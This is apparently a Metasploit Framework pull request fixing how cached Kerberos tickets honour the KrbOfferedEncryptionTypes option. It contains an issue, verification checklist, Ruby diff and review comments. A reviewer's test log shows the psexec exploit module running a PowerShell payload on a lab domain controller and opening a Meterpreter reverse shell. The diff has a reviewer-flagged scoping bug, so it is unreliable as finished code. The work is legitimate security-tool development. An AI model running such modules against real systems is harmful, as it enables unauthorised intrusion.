### PR TITLE
Only retrieve cached credentials that match the requested KrbOfferedEncryptionTypes

### LINKED ISSUE #19126: KrbOfferedEncryptionTypes setting isn't always respected
The KrbOfferedEncryptionTypes setting isn't respected if there's already a "matching" ticket in the kerberos cache.

## Steps to reproduce

- Setup: clear the kerberos cache (`klist -d`)
- Use a kerberos-supported module
- Run the module with kerberos auth (should default to AES256)
 - Observe the communications in wireshark - will likely be AES256
- Note that the kerberos cache now has tickets (`klist`)
- Re-run the module, forcibly setting krbofferedencryptiontypes to RC4-HMAC
 - Observe the communications in wireshark - should be RC4-HMAC, but is actually AES256
- Delete kerberos tickets: `klist -d`
- Re-run the module, forcibly setting krbofferedencryptiontypes to RC4-HMAC
 - Observe the communications in wireshark - is now RC4-HMAC

## Expected behaviour

- If an encryption type is set that does not match tickets in the kerberos cache, it should re-request a Kerberos ticket OR warn the user about this edge case

Tested on metasploit commit: c9dfb7e34ffd91af392648966f0e069685736298

### PR DESCRIPTION
**Pull request by smashery**
This resolves #19126. When specifying a particular `KrbOfferedEncryptionTypes` value, the MSF Kerberos cache now respects the value.

## Verification

To check this, run any kerberos-supported module. Validate that:

- [x] The `klist` command still works as normal (it now shows the etype of the cached cred)
- [x] When `KrbOfferedEncryptionTypes` is set to a specific value, the selection from the cache respects this. You can tell by observing the "Using cached credential" message; but it may also be worth observing directly in Wireshark.
- [x] When an active cached cred matched the `KrbOfferedEncryptionTypes`, it is used.
- [x] When no active cached cred matches the `KrbOfferedEncryptionTypes`  values, MSF goes through the Kerberos procedure...
- [x] ...for TGT and TGS
- [x] ...for TGS only
- [x] When multiple matches are found in the cache with different etypes, the system returns them in order of `KrbOfferedEncryptionTypes` preference (so if `KrbOfferedEncryptionTypes` is `AES256,RC4-HMAC`, it will choose the AES one, and vice versa).

### CODE REVIEW

**Review by smcintyre-r7 — APPROVED** [review]
These changes all look good to me, I don't have anything to request. Thanks for fixing this.

In the testing excerpt below we can see the different etypes for the different services based on the `KrbOfferedEncryptionTypes` value at the time the module was run.

```
metasploit-framework.pr (S:0 J:0) exploit(windows/smb/psexec) > klist
Kerberos Cache
==============
id  host            principal               sname                              enctype   issued                     status  path
--  ----            ---------               -----                              -------   ------                     ------  ----
12  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   AES256    2024-10-28 09:31:29 -0400  active  /home/smcintyre/.msf4/loot/20241028093138_default_192.168.159.10_mit.kerberos.cca_928033.bin
13  192.168.159.10  smcintyre@MSFLAB.LOCAL  ldap/dc.msflab.local@MSFLAB.LOCAL  AES256    2024-10-28 09:31:31 -0400  active  /home/smcintyre/.msf4/loot/20241028093139_default_192.168.159.10_mit.kerberos.cca_876006.bin
14  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   AES128    2024-10-28 09:38:14 -0400  active  /home/smcintyre/.msf4/loot/20241028093822_default_192.168.159.10_mit.kerberos.cca_707300.bin
15  192.168.159.10  smcintyre@MSFLAB.LOCAL  ldap/dc.msflab.local@MSFLAB.LOCAL  AES128    2024-10-28 09:38:14 -0400  active  /home/smcintyre/.msf4/loot/20241028093822_default_192.168.159.10_mit.kerberos.cca_264850.bin
16  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   RC4_HMAC  2024-10-28 09:43:36 -0400  active  /home/smcintyre/.msf4/loot/20241028094344_default_192.168.159.10_mit.kerberos.cca_373841.bin
17  192.168.159.10  smcintyre@MSFLAB.LOCAL  cifs/dc.msflab.local@MSFLAB.LOCAL  RC4_HMAC  2024-10-28 09:43:36 -0400  active  /home/smcintyre/.msf4/loot/20241028094344_default_192.168.159.10_mit.kerberos.cca_252513.bin

metasploit-framework.pr (S:0 J:0) exploit(windows/smb/psexec) > set SMB::KrbOfferedEncryptionTypes AES128
SMB::KrbOfferedEncryptionTypes => AES128
metasploit-framework.pr (S:0 J:0) exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Using cached credential for krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL smcintyre@MSFLAB.LOCAL
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20241028094443_default_192.168.159.10_mit.kerberos.cca_629682.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4362
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Sending stage (176198 bytes) to 192.168.250.59
[*] Meterpreter session 4 opened (192.168.250.134:4444 -> 192.168.250.59:58874) at 2024-10-28 09:44:44 -0400

meterpreter > exit
[*] Shutting down session: 4

[*] 192.168.159.10 - Meterpreter session 4 closed.  Reason: User exit
metasploit-framework.pr (S:0 J:0) exploit(windows/smb/psexec) > klist
Kerberos Cache
==============
id  host            principal               sname                              enctype   issued                     status  path
--  ----            ---------               -----                              -------   ------                     ------  ----
12  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   AES256    2024-10-28 09:31:29 -0400  active  /home/smcintyre/.msf4/loot/20241028093138_default_192.168.159.10_mit.kerberos.cca_928033.bin
13  192.168.159.10  smcintyre@MSFLAB.LOCAL  ldap/dc.msflab.local@MSFLAB.LOCAL  AES256    2024-10-28 09:31:31 -0400  active  /home/smcintyre/.msf4/loot/20241028093139_default_192.168.159.10_mit.kerberos.cca_876006.bin
14  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   AES128    2024-10-28 09:38:14 -0400  active  /home/smcintyre/.msf4/loot/20241028093822_default_192.168.159.10_mit.kerberos.cca_707300.bin
15  192.168.159.10  smcintyre@MSFLAB.LOCAL  ldap/dc.msflab.local@MSFLAB.LOCAL  AES128    2024-10-28 09:38:14 -0400  active  /home/smcintyre/.msf4/loot/20241028093822_default_192.168.159.10_mit.kerberos.cca_264850.bin
16  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   RC4_HMAC  2024-10-28 09:43:36 -0400  active  /home/smcintyre/.msf4/loot/20241028094344_default_192.168.159.10_mit.kerberos.cca_373841.bin
17  192.168.159.10  smcintyre@MSFLAB.LOCAL  cifs/dc.msflab.local@MSFLAB.LOCAL  RC4_HMAC  2024-10-28 09:43:36 -0400  active  /home/smcintyre/.msf4/loot/20241028094344_default_192.168.159.10_mit.kerberos.cca_252513.bin
18  192.168.159.10  smcintyre@MSFLAB.LOCAL  cifs/dc.msflab.local@MSFLAB.LOCAL  AES128    2024-10-28 09:44:35 -0400  active  /home/smcintyre/.msf4/loot/20241028094443_default_192.168.159.10_mit.kerberos.cca_629682.bin

metasploit-framework.pr (S:0 J:0) exploit(windows/smb/psexec) >
```

**Comment by smcintyre-r7** [comment]
# Release Notes
This fixes a bug in modules that use Kerberos authentication where when the `KrbOfferedEncryptionTypes` datastore option was set, it would be ignored instead of used to select a compatible ticket from the cache.

File: lib/msf/core/exploit/remote/kerberos/ticket/storage/read_mixin.rb [hunk 1]
```diff
@@ -6,9 +6,19 @@ def load_credential(options = {})
...
+        # Prefer etypes mentioned first
+        options[:offered_etypes].each do |etype|
+          available_tickets.each do |t|
+            if t.enctype == etype
+              return t.ccache.credentials.first
+            end
+          end
+        end
+      else
         return ticket.ccache.credentials.first
```
Comment (adfoster-r7) [inline lib/msf/core/exploit/remote/kerberos/ticket/storage/read_mixin.rb:22]: Looks like there's a bug here; `ticket` is no longer in scope
